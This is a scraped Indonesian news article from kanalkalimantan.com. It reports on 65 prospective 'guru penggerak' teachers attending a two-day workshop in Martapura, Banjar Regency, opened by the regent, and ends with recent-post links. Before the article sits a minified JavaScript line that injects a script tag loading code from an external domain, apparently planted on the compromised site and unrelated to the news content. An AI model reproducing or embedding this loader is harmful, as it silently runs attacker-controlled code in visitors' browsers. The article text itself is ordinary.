(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

65 Peserta Calon Guru Penggerak di Kabupaten Banjar Ikuti Lokakarya


KANALKALIMANTAN.COM, MARTAPURA –
Bupati Banjar H Saidi Mansyur mengingatkan para tenaga pengajar bahwa yantangan di dunia pendidikan yang makin kompleks menuntut guru untuk selalu kuat dalam menghadapinya seperti wilayah geografis dan infrastruktur.

Hal tersebut disampaikannya saat membuka Lokakarya 7 Festival Panen Hasil Pendidikan program pendidikan guru penggerak angkatan 9 dengan tema “Menyemai Inspirasi Menuai Perubahan” di Aula KH Kasyful Anwar, Martapura, Selasa (30/4/2024) pagi.

Dia mengatakan, guru merupakan garda terdepan dalam dunia pendidikan dan kegiatan ini dapat menginspirasi pendidikan di Kabupaten Banjar agar lebih baik lagi.

“Peran para guru yang luar biasa di bidang pendidikan dengan berbagai macam program yang dilaksanakan guru penggerak dengan karya-karya yang beragam menjadi warna pendidikan di Kabupaten Banjar,” ujar Saidi.

Baca juga: Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

Proses transformasi pendidikan lanjut Saidi harus melibatkan berbagai pihak, tidak hanya guru tetapi juga dinas terkait.

Agar pendidikan di Kabupaten Banjar tidak tertinggal dengan daerah lain, selalu update teknologi dengan menggali potensi diri serta didukung pemerintah daerah sehingga dapat dinilai dengan baik sesuai dengan program pemerintah.

Baca juga: Bupati Banjar Buka Temu Teknis Penyuluh Pertanian se Kabupaten Banjar

Kepala Dinas Pendidikan Kabupaten Banjar Liana Penny menjelaskan, kegiatan lokakarya diikuti 65 peserta calon guru penggerak yang akan dilaksanakan selama dua hari. Sementara pendidikannya akan dilaksanakan selama 6 bulan.

“Sebelum Diklat calon guru penggerak dilakukan dua kali pretes. Pertama membuat tulisan atau makalah, apabila lulus dilakukan lagi tes kedua wawancara atau simulasi mengajar oleh kementerian pendidikan,” jelas dia.

Baca juga: Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

Semua 65 calon guru penggerak adalah guru PAUD, SD, SMP dan SMA sederajat yang berperan sebagai penggerak, tergerak dan bergerak untuk siswa siswi, teman sejawat dan komunitasnya.

“Lokakarya 7 dilaksanakan selama dua hari mempunyai inovasi yang bagus, terbanyak mengenai literasi dan numerasi sesuai dengan rapor pendidikan di sekolah masing-masing yang harus diperbaiki” pungkas dia. (kanalkalimantan.com/dkispbanjar/kk)

Reporter: kk
Editor: Dhani


Muhammad Andi

Recent Posts

21 Mei: Sejarah Hari Peringatan Reformasi nasional

KANALKALIMANTAN.COM - Hari Reformasi Nasional diperingati setiap 21 Mei, menjadi momen pengingat seluruh masyarakat Indonesia… Read More

2 jam ago

Syarat Dukungan Ditolak, Bakal Calon Perseorangan Pilwali Banjarmasin Ajukan Sengketa ke Bawaslu

KANALKALIMANTAN.COM, BANJARMASIN - Di awal tahapan Pemilihan Wali Kota dan Wakil Wali Kota (Pilwali) Banjarmasin… Read More

12 jam ago

ETLE Segera Terpasang di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah titik krusial pelanggaran lalu lintas dan kerawanan kecelakaan lalu lintas menjadi… Read More

12 jam ago

Dinas PUPR Kalsel Gelar Bimtek Pengelolaan Air Limbah

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Provinsi Kalsel mengadakan kegiatan Bimbingan… Read More

13 jam ago

Rekomendasi Partai Tak Pasti, Jaya-Abdi Siap Jadi Penantang Petahana Aditya-Yuti

Jaya : Penantang Bisa Lebih dalam Mengevaluasi Kinerja Petahana Read More

14 jam ago

Lima Jabatan di Polres Banjarbaru Rotasi, 12 Personel Terima Penghargaan Kapolda

KANALKALIMANTAN.COM, BANJARBARU - Lima jabatan yang diisi para perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

15 jam ago

This website uses cookies.